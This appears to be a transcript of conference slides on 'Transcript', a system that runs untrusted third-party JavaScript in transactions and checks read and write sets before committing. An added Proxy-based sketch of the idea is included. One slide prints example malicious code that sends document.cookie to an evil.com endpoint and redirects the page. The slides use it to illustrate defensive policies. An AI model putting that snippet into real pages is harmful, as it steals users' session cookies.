Published by Tommy Skye. Modified over 9 years ago.
1
The Case for JavaScript Transactions
Mohan Dhawan, Chung-chieh Shan, Vinod Ganapathy
Department of Computer Science, Rutgers University
PLAS 2010
2
Problem
- Web applications include third party content
- Examples: widgets, advertisements, libraries
- May contain untrusted, malicious JavaScript
April 13, 2015, PLAS 2010
3
Example from nytimes.com
- Rogue third party advertisement
- Displayed image of fake virus scan
- Client security and privacy at risk
4
Goal
- Protect Web application data by isolating untrusted JavaScript code
- Must handle arbitrary 3rd party code written in JavaScript
  - Including constructs such as eval, this, with.
- Must enforce powerful security policies
  - Allow pop-ups from white-listed websites only.
5
Outline
- Problem
- Transcript
- Example
- Implementation
- Related Work
- Conclusion
6
Solution: Transcript
- Extend JavaScript to support Transactions
- Execute untrusted content speculatively
- Commit changes after policy enforcement
[Figure labels: Transaction, Web Application]
7
Transcript features
- Speculative execution of unmodified third party JavaScript code
- Suspend transactions on DOM and AJAX operations
- Transactional execution of event handlers
8
Schematic use of Transcript

    // Web application code
    var tx = transaction {
      ...
      // unmodified 3rd party code
      ...
    };
    // Introspection block goes below
    /* policy enforcement code */
    // validate actions of the transaction
    tx.commit();
    // Rest of the Web application code

[Figure labels: Transaction, Web Application]
9
Outline
- Problem
- Transcript
- Example
- Implementation
- Related Work
- Conclusion
10
Example: Untrusted code

    // Web application code
    var tx = transaction {
      var image = document.createElement('img');
      var url = "http://evil.com/grabcookie.php";
      var params = document.cookie;
      image.src = url + "?cookie=" + params;
      document.body.appendChild(image);
      ...
      window.location = "http://evil.com";
    };

[Figure labels: Transaction, Web Application]
11
Transcript Runtime

    // Web application code
    tx = transaction {
      ...
      body.appendChild(image);
      ...
    };
    do {
      ...
      tx = tx.resume();
      ...
    } while (tx.isSuspended());
    tx.commit();
    // Rest of the Web application

[Figure labels: web app call stack; 3rd party call stack; Transaction object tx (read and write sets, 3rd party call stack); Introspection block; Transcript runtime system; resume; numbered steps 1 to 5; Heap new = Heap orig + tx's write set]

- On a transaction suspend, the Transcript runtime saves (i) the read and write sets and (ii) the stack frames up to the nearest transaction delimiter to create a Transaction object.
- The Transcript runtime loads the saved read and write sets and stack frames when the transaction resumes.
- The Transcript runtime applies the write set changes to the JavaScript heap when the transaction commits.
12
Transaction suspend and resume

    var tx = transaction {
      ...
      document.body.appendChild(image);
    };
    do {
      var rs = tx.getReadSet(), arg = tx.getArgs();
      switch (tx.getCause()) {
        case "appendChild":
          if (arg[0].nodeName.match("IMG") &&
              !rs.checkMembership(document, "cookie"))
            obj.appendChild(arg[0]);
          break;
      }; /* end switch */
      tx = tx.resume();
    } while (tx.isSuspended());

Policy (highlighted on the slide):

    if (arg[0].nodeName.match("IMG") &&
        !rs.checkMembership(document, "cookie"))
      obj.appendChild(arg[0]);

[Figure labels: Transaction, Web Application]
13
Read and Write Sets

    var tx = transaction {
      ...
      window.location = "http://evil.com";
    };
    /* Introspection Code */
    var ws = tx.getWriteSet();
    if (ws.checkMembership(window, "location")) {
      var loc = ws.getValue(window, "location");
      if (!isWhiteListed(loc)) to_commit = false;
    }
    // Rest of the web application code

Policy (highlighted on the slide):

    var ws = tx.getWriteSet();
    if (ws.checkMembership(window, "location")) {
      var loc = ws.getValue(window, "location");
      if (!isWhiteListed(loc)) to_commit = false;
    }

[Figure labels: Transaction, Web Application]
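Transcript logs reads and writes inside a modified interpreter. As an added example (not from the slides or the Transcript prototype), the following approximates the read/write-set idea from the "Read and Write Sets" slide in standard JavaScript using Proxy. The names speculate, runGuarded, ALLOWED and the win/doc stand-in objects are assumptions, and only top-level properties of the objects handed to the untrusted function are tracked.

```javascript
// Added illustration: buffers writes and logs reads through ES Proxy objects.
// speculate, runGuarded, ALLOWED and the win/doc stand-ins are constructed here.
function speculate(roots, untrusted) {
  const reads = new Map();  // object -> Set of properties read
  const writes = new Map(); // object -> Map(property -> buffered value)
  const wrap = (obj) => new Proxy(obj, {
    get(o, p) {
      if (!reads.has(o)) reads.set(o, new Set());
      reads.get(o).add(p);
      const w = writes.get(o);
      return w && w.has(p) ? w.get(p) : o[p]; // transaction sees its own writes
    },
    set(o, p, v) {
      if (!writes.has(o)) writes.set(o, new Map());
      writes.get(o).set(p, v); // buffered: the real object is untouched
      return true;
    },
  });
  untrusted(...roots.map(wrap)); // untrusted code only receives the proxies
  const member = (log) => (o, p) => log.has(o) && log.get(o).has(p);
  return {
    getReadSet: () => ({ checkMembership: member(reads) }),
    getWriteSet: () => ({
      checkMembership: member(writes),
      getValue: (o, p) => writes.get(o).get(p),
    }),
    commit() { // apply the write set to the real objects
      for (const [o, props] of writes) for (const [p, v] of props) o[p] = v;
    },
  };
}

const ALLOWED = new Set(["https://example.com"]); // constructed allow list
function isWhiteListed(loc) {
  try { return ALLOWED.has(new URL(loc).origin); } catch (e) { return false; }
}

// Introspection block from the slide, wrapped in a function for reuse.
function runGuarded(win, doc, untrusted) {
  const tx = speculate([win, doc], untrusted);
  const ws = tx.getWriteSet();
  let toCommit = true;
  if (ws.checkMembership(win, "location") &&
      !isWhiteListed(ws.getValue(win, "location"))) toCommit = false;
  if (toCommit) tx.commit();
  const readCookie = tx.getReadSet().checkMembership(doc, "cookie");
  return { committed: toCommit, readCookie };
}
```

Unlike the interpreter-level logging described in the talk, this sketch isolates nothing that the untrusted function can reach without going through the proxies, such as real globals.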
14
Outline
- Problem
- Transcript
- Example
- Implementation
- Related Work
- Conclusion
15
Implementation
- Prototype implementation in Firefox 3.7a4
- Added new JavaScript features
  - transaction keyword and Transaction object
- Modified interpreter op-codes to
  - Log all object accesses
  - Suspend on DOM / AJAX calls
- For details on the semantics of transactions, refer to the paper.
16
Outline
- Problem
- Transcript
- Example
- Implementation
- Related Work
- Conclusion
17
Related Work
- Staged information flow in JavaScript: PLDI'09
  - hybrid framework for JavaScript with the aim of protecting Web applications from untrusted code
- ConScript: S&P'10
  - aspect-oriented framework to specify and enforce fine-grained security policies for Web applications
- AdJail: USENIX Security'10
  - isolation mechanism to protect Web application content from malicious advertisements
- Caja, FBJS, AdSafe, etc.
18
Conclusion
- JavaScript transactions provide isolation
  - Suspend operations that break isolation
  - Resume operation if web application allows
- Enforcement of powerful security policies
  - All data reads / writes are recorded
  - Ability to inspect reads / writes before commit
- No restriction or changes to third party code
19
Questions?